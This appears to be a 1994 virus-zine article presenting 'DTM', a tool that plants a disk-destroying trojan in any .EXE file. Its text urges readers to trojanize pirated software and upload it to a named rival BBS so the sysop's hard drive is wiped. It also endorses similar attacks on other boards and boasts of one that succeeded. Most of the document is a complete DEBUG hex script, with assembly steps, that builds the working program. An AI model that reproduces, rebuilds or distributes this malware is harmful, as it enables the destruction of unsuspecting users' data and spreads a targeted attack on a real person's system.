DTM - Dead to Minotauro BBS silly Trojan installer.
-----------------------------------------------------------------------------

Well, this is a small program I wrote to eradicate a small nuisance this
magazine has, known as 'Minotauro BBS'.

This self-proclaimed BBS has caused a number of problems to our readers,
since logically they associate this magazine (Minotauro, get it?) with the
BBS of the same name.  We've asked him several times to change the name of
his system, but he just won't listen, as he's a Warez D00D  :0.

Very well, THIS BBS HAS NOTHING, I repeat.., NOTHING TO DO WITH MINOTAURO
MAGAZINE.  Unfortunately, the sysop will just not listen to reason, so we've
developed this little program for our readers.

The program is DTM, Dead to Minotauro BBs silly trojan installer ;).  It will
install a trojan into any .EXE you want.

The idea is for you to help us.  Take any '0-0 day Warez', add the trojan to
any .EXE in the program and upload it to the BBS, so that poor amorphous
thing known as the Sysop will enthusiastically execute it and watch as his
hard drive turns to, in a word, SHIT.  Though it doesn't seem likely, it
should work since the Sysop is not very 'brilliant' (we don't want to say
he's terminally stupid).  ;;;).

We are providing this program as a DEBUG script.  To convert it into an
executable .COM file, proceed as follows:

o    Eliminate all the text on outside of the lines that read "cut  here",
     including those lines, too, and save the file as DEBUG.SCR.  The file
     must contain ONLY the debug script.

o    Next, type  DEBUG < DEBUG.SCR   where DEBUG.SCR is the file you just
     created.

o    Done!.

If you did everything right, you'll create a file called DTM.COM.  It's very
easy to use: execute it and give it the name of the file you want to
"trojanize".

If you want to use DTM to fuck with some other BBS, I must warn you that the
message displayed when it trashes the HD isn't going to quite match your
intentions, since the trojan was written SPECIFICALLY for the Minotauro BBS. 
But you can change the text using Norton Disk Editor (how lame, as the Warez
D00dz might say).

Also, don't fire off trojans to every BBS in the world (a stupid thing to do,
in my opinion), but if you have a GOOD reason, go for it!    :)

Well, we expect you to upload beaucoup trojans to Minotauro BBS and trash his
HD every time he gets it up.  Maybe he'll finally learn.


NOTE: A trojan was uploaded to Minotauro BBS (I won't say by whom ;)  ) and
apparently it's had its effect.  I've heard that board is no longer answering 
.......  ;)

All the same, keep an eye out for him!

                                             By WM’
                                - Inertia keeps the World turning -

-- Cut   Here  -------------------------------------------------------------
N DTM.COM
E 0100 E9 D7 04 C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4
E 0110 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4
E 0120 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4
E 0130 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4
E 0140 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4
E 0150 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4
E 0160 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4
E 0170 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4
E 0180 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4
E 0190 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4
E 01A0 0F C4 0F 20 0F 20 0F DA 07 CB 07 CB 07 CD 0F CD
E 01B0 0F CB 0F BF 0F 20 0F DA 07 CD 07 D1 07 CB 0F D1
E 01C0 0F CD 0F BF 0F 20 0F DA 07 CB 07 CD 07 CB 0F CD
E 01D0 0F CB 0F BF 0F 20 0F 20 0F 20 0F 44 0F 65 0F 61
E 01E0 0F 64 0F 20 0F 54 0F 6F 0F 20 0F 4D 0F 69 0F 6E
E 01F0 0F 6F 0F 54 0F 61 0F 75 0F 72 0F 6F 0F 20 0F 42
E 0200 0F 42 0F 53 0F 20 0F 53 0F 69 0F 6C 0F 6C 0F 79
E 0210 0F 20 0F 54 0F 72 0F 6F 0F 79 0F 61 0F 6E 0F 20
E 0220 0F 49 0F 6E 0F 73 0F 74 0F 41 0F 6C 0F 6C 0F 65
E 0230 0F 72 0F 2E 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20
E 0240 0F 20 0F 20 0F 20 0F B3 03 BA 03 BA 03 20 03 20
E 0250 03 BA 0B B3 0B 20 0B 20 0B 20 0B B3 03 BA 0B B3
E 0260 0B 20 0B 20 0B 20 0B B3 03 BA 03 20 03 BA 0B 20
E 0270 0B BA 0B B3 0B 20 0B 20 0B 20 0B 28 0F 63 0F 29
E 0280 0F 20 0F 31 0F 39 0F 39 0F 34 0F 2C 0F 20 0F 62
E 0290 0F 79 0F 20 0F 57 0F 4D 0F 92 0F 20 0F 20 0F 20
E 02A0 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20
E 02B0 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20
E 02C0 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20
E 02D0 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20
E 02E0 0F 20 0F C4 0F 20 0F C0 01 CA 01 CA 01 CD 09 CD
E 02F0 09 CA 09 D9 09 20 09 20 09 20 09 CF 01 CA 09 CF
E 0300 09 20 09 20 09 20 09 C0 01 CA 01 20 01 20 01 20
E 0310 01 CA 09 D9 09 20 09 C4 0F C4 0F C4 0F C4 0F C4
E 0320 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4
E 0330 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4
E 0340 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4
E 0350 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4
E 0360 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4
E 0370 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4 0F C4
E 0380 0F C4 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20
E 0390 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20
E 03A0 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20
E 03B0 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20
E 03C0 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20
E 03D0 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20
E 03E0 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20
E 03F0 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20
E 0400 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20
E 0410 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20 0F 20
E 0420 0F 20 0F 44 65 61 64 20 74 6F 20 4D 69 6E 6F 54
E 0430 61 75 72 6F 20 42 42 53 20 53 69 6C 6C 79 20 54
E 0440 72 6F 79 61 6E 20 49 6E 73 74 61 6C 6C 65 72 2E
E 0450 20 28 63 29 20 31 39 39 34 2C 20 62 79 20 57 4D
E 0460 92 0D 0A AD 4E 61 64 61 20 71 75 65 20 76 65 72
E 0470 20 63 6F 6E 20 4D 69 6E 6F 74 61 75 72 6F 20 4D
E 0480 61 67 61 7A 69 6E 65 21 2E 0D 0A 24 0D 0A FE 20
E 0490 41 72 63 68 69 76 6F 3A 20 24 0D 0A FE 20 45 72
E 04A0 72 6F 72 20 61 6C 20 41 62 72 69 72 20 46 69 6C
E 04B0 65 21 07 0D 0A 24 0D 0A FE 20 46 69 6C 65 20 41
E 04C0 62 69 65 72 74 6F 20 4F 6B 21 2E 2E 24 0D 0A FE
E 04D0 20 45 72 72 6F 72 21 2C 20 4E 6F 20 73 65 20 70
E 04E0 75 64 6F 20 6C 65 65 72 20 48 65 61 64 65 72 20
E 04F0 6F 20 4E 6F 20 65 73 20 75 6E 20 45 58 45 21 07
E 0500 0D 0A 24 0D 0A FE 20 48 65 61 64 65 72 20 64 65
E 0510 6C 20 45 78 65 20 6C 65 A1 64 6F 20 4F 6B 21 2E
E 0520 2E 24 0D 0A FE 20 45 72 72 6F 72 20 61 6C 20 49
E 0530 6E 73 74 61 6C 61 72 20 54 72 6F 79 61 6E 6F 21
E 0540 2E 07 0D 0A 24 0D 0A FE 20 54 72 6F 79 61 6E 6F
E 0550 20 49 6E 73 74 61 6C 61 64 6F 20 43 6F 72 72 65
E 0560 63 74 61 6D 65 6E 74 65 21 2E 0D 0A 24 0D 0A FE
E 0570 20 45 72 72 6F 72 20 61 6C 20 43 61 6D 62 69 61
E 0580 72 20 48 65 61 64 65 72 21 2E 07 0D 0A 24 0D 0A
E 0590 FE 20 48 65 61 64 65 72 20 4D 6F 64 69 66 69 63
E 05A0 61 64 6F 20 4F 4B 21 2E 0D 0A 24 0D 00 00 00 00
E 05B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 05C0 00 00 00 00 00 00 00 00 00 00 DA 08 00 00 5A 07
E 05D0 00 00 00 00 00 00 00 00 00 00 E8 5A 01 E8 68 01
E 05E0 B4 02 BA 00 05 CD 10 BA 23 04 E8 45 01 BA 8C 04
E 05F0 E8 3F 01 B4 0A BA AB 05 CD 21 2E 80 3E AD 05 20
E 0600 74 0B 2E 80 3E AD 05 0D 74 03 EB 06 90 E8 27 01
E 0610 EB C8 33 C0 2E A0 AC 05 BE AD 05 03 F0 33 C0 8B
E 0620 FE AA E8 0B 00 E8 23 00 E8 65 00 B8 00 4C CD 21
E 0630 B8 02 3D BA AD 05 CD 21 72 09 8B D8 BA B6 04 E8
E 0640 F0 00 C3 BA 9A 04 E8 E9 00 EB E0 B4 3F B9 20 00
E 0650 BA BA 05 CD 21 72 10 2E 81 3E BA 05 4D 5A 75 07
E 0660 BA 03 05 E8 CC 00 C3 B4 3E CD 21 BA CD 04 E8 C1
E 0670 00 EB B8 B4 40 B9 80 00 90 BA 5A 07 CD 21 72 01
E 0680 C3 5A 58 59 B4 3E CD 21 BA 22 05 E8 A4 00 EB 9B
E 0690 B8 02 42 33 C9 33 D2 CD 21 73 03 E9 87 00 25 0F
E 06A0 00 0B C0 74 09 B9 10 00 2B C8 B4 40 CD 21 B8 02
E 06B0 42 33 C9 33 D2 CD 21 72 6C B1 04 D3 E8 B1 0C D3
E 06C0 E2 03 D0 2E 2B 16 C2 05 52 E8 A7 FF 5A 2E 89 16
E 06D0 C8 05 2E 89 16 D0 05 2E C7 06 CE 05 00 00 2E C7
E 06E0 06 CA 05 80 01 B8 02 42 33 C9 33 D2 CD 21 72 35
E 06F0 B9 00 02 F7 F1 40 2E 89 16 BC 05 2E A3 BE 05 B8
E 0700 00 42 33 C9 33 D2 CD 21 72 1B B4 40 B9 20 00 BA
E 0710 BA 05 CD 21 B4 3E CD 21 BA 8E 05 E8 14 00 BA 45
E 0720 05 E8 0E 00 C3 B4 3E CD 21 BA 6D 05 E8 03 00 E9
E 0730 F9 FE B4 09 CD 21 C3 B8 00 B8 8E C0 33 C0 33 FF
E 0740 B9 D0 07 F3 AB 0E 07 C3 B8 00 B8 8E C0 33 FF BE
E 0750 03 01 B9 20 03 F3 A4 0E 07 C3 E8 00 00 CC 5D 81
E 0760 ED 5D 07 BB 87 07 B5 00 B4 04 FE C4 BA 80 00 CD
E 0770 13 FE C5 80 FD 99 75 F0 0E 1F B4 09 8D 96 87 07
E 0780 CD 21 B8 00 4C CD 21 9D ED 75 20 68 E0 76 EE 20
E 0790 62 EE EE EF 20 E7 ED 6C 64 21 2E 20 53 ED 6C ED
E 07A0 20 68 E0 9D 20 55 EF 20 4D 69 EF ED E7 E0 75 72
E 07B0 ED 2E 2E 2E 0D 0A 9D 20 EF ED 20 EE 73 20 EE 73
E 07C0 E7 EE 2E 2E 2E 20 4A EE 6A EE 21 2E 2E 2E 20 E1
E 07D0 9D EE E1 9D EE 21 2E 0D 0A 24
RCX
06DA
W
Q
-- Cut   Here --------------------------------------------------------------

